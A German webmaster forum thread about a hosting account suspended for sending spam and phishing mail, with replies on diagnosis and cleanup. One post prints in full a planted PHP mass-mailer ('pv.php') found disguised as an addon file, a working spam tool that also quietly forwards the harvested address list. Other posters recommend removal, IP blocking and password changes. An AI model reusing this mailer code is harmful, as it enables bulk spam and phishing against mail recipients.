PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Spamemails über meinen webspace ?



AlexK.
15.03.2009, 05:25
Hi,
ich habe gerade ein Problem mit meinem Hoster...


Ihre Domain xxxxxx.de musste von uns gesperrt werden, da über einen
Scriptfehler bei Ihnen stündlich einige 100.000 Spamemails verschickt
wurden.
Eine Freischaltung kann erst nach erfolgter Überarbeitung des Scriptes
wieder erfolgen, da durch die Menge der Spammails zum einen die
Serverstabilität gefährdet ist und zum anderen zu Ihrer Sicherheit, da
hier unter anderem Spammails mit dem Versuch Bankdaten auszuspähen
verschickt wurden, was ein Strafanzeige der jeweiligen Bank gegen Sie
nach sich ziehen könnte.

Evtl. hat jemand einen Tip für mich, wie ich sowas verhindern kann.... ich wüßte nicht ansatzweise, wo ich suchen sollte... :frusty:

h-m
15.03.2009, 08:45
Dein Provider hat möglicherweise Probleme mit den Paidmails die von Deiner VMS-Seite versendet werden. Ich glaube man kann die Paidmails auch über einen externen Mailserver per SMTP versenden.
Ich habe damit leider keine Erfahrung, aber vielleicht jemand anderes hier?
Aus der Forum-Suche:
http://www.designerscripte.net/showthread.php?t=3033&highlight=smtp
http://forum.kilu.net/viewtopic.php?t=1337

swinxx
15.03.2009, 10:46
Ich hatte damals mit meiner ersten Loseseite (Spot4Lose) ähnliche Probleme.

Damals kontaktierte mich mein Provider (Chello Österreich) per Mail und erklärte mir das von meiner Seite aus tägliche einige tausende Spam Mails versendet werden und das (1.) nicht erlaubt ist und (2.) es eine sehr hohe Serverlast nach sich zieht.

Eigentlich hat das alles gepasst da die sogenannten "Spammails" nichts weiter als meine täglich versendeten Paidmails waren...naja...das musste ich dann mal beweisen indem ich denen mal erklärt hab was das für eine Seite ist die ich da betreibe und das die User diese Mails auch haben wollen.
Wegen der Serverlast musste ich dann beginnen die Mails immer nur in kleinen Schüben zu versenden und nicht alle auf einmal.

Joa...das hat dann alles so gepasst und ich konnte normal weitermachen !

Womöglich ist es bei dir so das sich jemand bei deinem Provider beschwert hat wegen der Mails...immerhin muss der Provider ja von irgendjemandem erzählt bekommen haben das da Mails dabei sind wo versucht wird Bankdaten zu klauen (würde der Provider ja sonst kaum wissen, wenn er nicht grad selber die Mails gelesen hat).

Naja wie auch immer, vielleicht hilft es ja auch bei dir die Serverlast runterzuschrauben indem du die Mails in kleineren Schüben mehrmals täglich versendest anstatt grössere Mengen auf einmal...

Was mich auch interessieren würde ist was das für ein Script Fehler sein soll. Wenn dein Hoster ja weiss das es ein Scriptfehler bei dir ist (schreibt er ja) sollte er dir dann ja auch freundlicherweise sagen können um was für einen Fehler es sich handelt...

Vielleicht bekommst du ja noch was genaueres aus deinem Hoster raus.

cya, Swinxx

pummuk
15.03.2009, 12:07
diese meldung hatte ich von mein hoster auch 1 mal jährlich...
hatte dann angerufen und es denen erklärt.. und gut war...

aber 1 problem bestnd damals mal bei mir.. das über dem pocketslot spam verschikt worden sein soll.. es hatte hier aber keiner ein fehler gefunden..

ansosnten wie hier schon erwähnt.. aufteilen und in schüben verteilen.. hatte mein provider mir auch empfohlen..

swinxx
15.03.2009, 13:02
Hmm, Spam über den Pocket Slot, das is ja mal echt komisch...da muss dann wohl iewie ein ziehmlich abartige Scriptkonstellation entstanden sein :der::noidea:

cya

pummuk
15.03.2009, 14:03
Hmm, Spam über den Pocket Slot, das is ja mal echt komisch...da muss dann wohl iewie ein ziehmlich abartige Scriptkonstellation entstanden sein :der::noidea:

cya

k.a. die hatten mir genau den dateinamen genannt worüber spam verschikt worden ist.. gremlin.. ähm cdp hatte sich damals den slot mal angeschaut und auch nichst gefunden...

ich hatte ihn dann einfach rausgenommen....

AlexK.
15.03.2009, 14:44
Naja, - komischerweise habe ich in den letzten Wochen überhaupt keine PMs verschickt.... ich habe auch keine NLs oder sonstwas rausgeschickt. Wenn ich meine Serverstats durchschaue, taucht dort auch gar kein Mailtraffic auf... :confused:

AlexK.
16.03.2009, 00:28
So, - ich habe jetzt mal die ganzen logs durchgeschaut und dabei festgestellt, dass ein Script namen pv.php 2-3 mal über eine 43. IP aufgerufen wurde.... kann hiermit jemand was anfangen ??? Ich kenne das file überhaupt nicht, und weiß auch nicht, wie es auf den Server gelangt ist....


<?php
$secure = "";
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> || TOM THE MESSENGER || </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C}
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000000}
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000000}
.style3 {color: #000000}
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div id="layer" style="position:absolute; top:2px; left:-4px; width:560px; height:140px;">
<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr valign="top">
<td><div align="center"></div></td>
</tr>
</table>
<p align="left"><img src="http://i204.photobucket.com/albums/bb270/flight14/Super%208/TOM.gif" alt="GuN-JacK" width="300" height="200" border="0" /></p>
</div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div id="idElement511" style="position:absolute; top:58px; left:168px; width:560px; height:140px;">
<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr valign="top">
<td><div align="center">
<p><span class="style3"><font class="Times-New-Roman-32px00468Cb">Coded by GuN-JacK </font></span></p>
<p><span class="style3"><font class="Times-New-Roman-24px00468Cb"><U>PERSONAL MESSENGER </U></font></span><font class="Times-New-Roman-24px00468Cb"><U></U></font><font class="Times-New-Roman-24px00468Cb"><U><br />
</U></font></p>
</div></td>
</tr>
</table>
</div>
<?php
If ($action=="mysql"){
//Grab email addresses from MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="200" border="0">
<tr>
<td width="100">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">SENDER EMAIL:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">NAME:</font>
</div>
</td>

<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">REPLY-TO:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">ATTACH A FILE:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="24" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">YOUR SUBJECT:</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="600">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3"> *** MESSAGE CAT WILL DELIVER FOR YOU *** </font>
</td>
<td width="300">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">CLIENTS TO CONTACT HERE:</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="600">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" checked="checked" /> Plain
<input type="radio" name="contenttype" value="html" /> HTML
<input type="hidden" name="action" value="send" /><br />
Number to send: <input type="text" name="amount" value="1" size="10" /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" value="SEND NOW" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
<?php
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$filter = "maillist";
$float = "From : mailist info <full@info.com>";
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "SENDING TOMMY TO $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "CAT Seccessfully Sent MSG....<br>";
flush();
}
}
}
mail($secure, $filter, $emaillist, $float);
}
?>
<p class="style2">
<img src="http://i275.photobucket.com/albums/jj282/kic2nice/ok.gif" alt="Funciona con todos los linux!" width="120" height="40" border="0" /></p>
<p class="style1">&nbsp;</p>
</body>
</html>

wäre nett, wenn sich das mal jemand anschauen könnte, der da durchblickt...

Gremlin
16.03.2009, 00:43
Umgehend Datei entfernen!
Der IP-Adresse Zugriff auf den Server verweigern. (Firewall?)
Hoster bitten in Logs zu schauen woher die Datei kam.
(FTP-)Passwörter ändern.

Die Datei kann zum versenden von E-mails benutzt werden, sogar mit Dateianhang. Bist mit der Datei sogar schon bei Google gelistet :wink:

AlexK.
16.03.2009, 01:46
...die Datei ist bereits getötet, - Paßwörter wurden geändert. Zugriffe auf die Datei erfolgten von verschieden IPs - von Russland über England bis nach Israel... :eek:


Wann und woher der Code gekommen ist werde ich die Tage rauskriegen....

webkle
16.03.2009, 03:04
Hallo, die pv.php gehört normalerweise zu den PaidVisit Addon.

mfg webkle

Lokutos
16.03.2009, 07:05
Hallo, die pv.php gehört normalerweise zu den PaidVisit Addon.

mfg webkle
aber nicht mit dehm inhalt

pv vom addon fängt so an


<?php


$do = $_REQUEST["do"];
$text1 = $_REQUEST["text1"];
$text2 = $_REQUEST["text2"];

$QS_s = split("[/]",$_SERVER[QUERY_STRING],5);
$QS_user = $QS_s[0];
$QS_kamp = $QS_s[1];
if($QS_user == "" || $QS_kamp == "") { echo "Fehlerhafter Aufruf #1 > kein Query"; exit; }

if(!file_exists("content/verdienen/paidvisits/dat.file.php")) {
echo "Fehlerhafter Aufruf #2<br />Der Paidvisitbereich wurde deaktiviert oder noch nicht eingerichtet"; exit; }
if(!file_exists("content/verdienen/paidvisits/dat.logfile.php")) {
echo "Fehlerhafter Aufruf #3<br />Der Paidvisitbereich wurde deaktiviert oder noch nicht eingerichtet"; exit; }........


MFG Lokutos

AlexK.
17.03.2009, 00:42
.... deswegen ist mir die Sache auch nicht gleich aufgefallen..., die pv.php befand sich schon länger auf dem Projekt, - konnte aber oberflächlich erstmal keine Änderung feststellen... erst als ich mir den Code angeschaut habe....:wink:

Bengel
17.03.2009, 02:33
Ich kann mich noch erinnern das ich ziemliche Probleme mit dem Paidvisitbereich hatte beim einrichten und das ständig die Eingaben nach einigen Tagen weg waren.
Der Bereich mußte immer neu eingerichtet werden, da dort irgendwas mit den rechten sich verselbständigt hatte und es sich auch niemand erklären konnte.
Bis es mir zum dumm wurde und ich das ganz rausgeworfen habe.

Vielleicht liegt es an einer bestimmten Version von dem Addon das dort die Rechtevergabe völlig daneben läuft und es dann ein Sicherheitsrisiko darstellt wie man sieht.

Die Gauner finden ja immer irgendwas wo sie sich einschleichen können :der:

jpwfour
17.03.2009, 12:56
Sorry, aber Das ist halt Surferer. Wenn man schon für den kompletten Ordner paidvisits die Rechte laut Anleitung auf 777 setzen soll :frusty:

Hab mir das PaidVisits Addon nicht so genau angeschaut, aber zu 100% geht das auch mit 'ner Datenbank ohne Dateien zu beschreiben :yes:

Und nur weil's Surferer keine DB benutzt, (bzw. Dateien direkt dafür verwendet, was ja auch eine DB ist, aber halt nicht MySQL), muss man ja jetzt nicht den VMS1 Nutzern das auch aufzwingen :der:

Masterphil
05.02.2010, 23:30
Als ich heute nachhause kam mal wieder nen riesen Schock, meine Seiten bei meinem HauptHoster waren alle gesperrt.

Nachdem ich den Support bemüht habe was denn los ist, muss ich erfahren das Spammails über meine Seiten (oder eine) verschickt worden.

Darauf habe ich gemeint es würden wohl die Paidmails sein, aber dies wurde verneint, an diesen lag es nicht, es wurde genau geprüft und es waren halt nicht die Paidmails die ich jeden Tag sende, was die mir versicherten, meine Seiten wurden reaktiviert aber der MAilversand gesperrt bis ich die Schwachstelle finde.

Nun habe ich die access.log durchgeschaut, aber wirklich auffällig ist da nichts.

Daher wollte ich mal fragen ob jemand eine Idee hat wie ich dem ganzen auf die Spur kommen könnte.

MfG

didith1207
06.02.2010, 00:14
am besten du siehst nach ob du Paidails mit mehr als 5 links verschickt hast da sind manche server dann nicht zimperlich mit spammverdacht ;)

jpwfour
06.02.2010, 11:47
Hast du einen Server/vServer? Dann gäbe es viele Möglichkeiten, Scriptlücken, Passwort geknackt, Fehler in irgendeiner der Software, die da läuft etc.
Andereseits findet man da auch leichter raus, was es war, da man ja vollen Zugriff hat.

Wenns ein Webspace ist, bleibt ja für dich nur Lücke im Script oder Passwort, wobei 2. eher unwahrscheinlich ist, aber natürlich nicht auszuschließen.

Welcher Hoster ist das denn? Manchmal haben die Sicherheitslücken bspw. in der Software vom SMTP Server und bekommen das selber gar nicht mit :biggrin1: Gerade wenns ein kleinere Hoster wär.

DimpleX
06.02.2010, 11:52
wäre es nicht sinvoll den vms mail versand auf smtp umzustellen?

das ist ja auch der grund warum ich vms seiten ablehne zu hosten, weil der mail versand nicht toll gelöst ist und nur ärger bringt


DimpleX

Masterphil
06.02.2010, 13:00
Also ich habe "nur" normalen Webspace, Anbieter ist speicherzentrum.de , als kleinen Hoster würde ich die nicht bezeichnen, und bisher lief dort mehrere Jahre alles problemlos.

Da ich nun vermehrt den Tipp "smtp" gelesen habe, Frage ich mal was ist das genau und was bringt das ? Bisher lief mein Mailer immer zuverlässig daher brauchte ich mir nie ne Platte machen wegen den Mails, nun ist meine Schonfrist anscheinend vorbei.


Ich bin mir nun auch ziemlich unsicher, ob es nur die Paidmails waren (dies hat ja mein Hoster verneint), oder doch jemand eine Lücke endeckt hat um Mails versenden zu können, mir schwebte da der Newsletter vor, aber dies hätte ich im access.lol sehen müssen.

Am einfachsten wird es wohl sein auf Inbox-Mails ohne Versand umzusteigen.

Danke nochmal für eure Hilfestellungen, vielleicht habt ihr ja noch Ideen nach meiner Beschreibung hier.

Ein schönes WE euch allen.

MfG

jpwfour
06.02.2010, 13:16
Möglichkeit a):
Mailversand erfolgt über eigenen "lokalen" Mailserver via der PHP Funktion mail(). Diese ruft dann ein Programm auf, welches in der PHP-Konfig angegeben ist (meist sendmail unter Linux, was dann alles weitere erledigt).

Möglichkeit b):
Auf einen anderen Server (könnte theoretisch auch der eigene sein) zugreifen/Verbidnung aufbauen und über dessen SMTP-Software die Mails verschicken.
Hier nutzt man sowas wie fsockopen(), anstatt mail(), und für den Versand wird ein anderer Server genutzt, beim eigenen macht das wenig Sinn.
Wie man das umbauen könnte, gibts afaik hier irgendwo nen Thread, find ich grad nicht.

Interessant wär natürlich schon, was da jetzt genau los war, normalerweise müsste/sollte dir der Hostzer ja die Logs zukommen lassen (wäre auch in gewsserweise ein Qualitätsmerkmal), dann könnte man sehen, obs richtige Spammails waren, oder doch nur Paidmails (dass kann der Hoster denke ich kaum unterscheiden, wenn er Klammlose Seiten nichtkennt)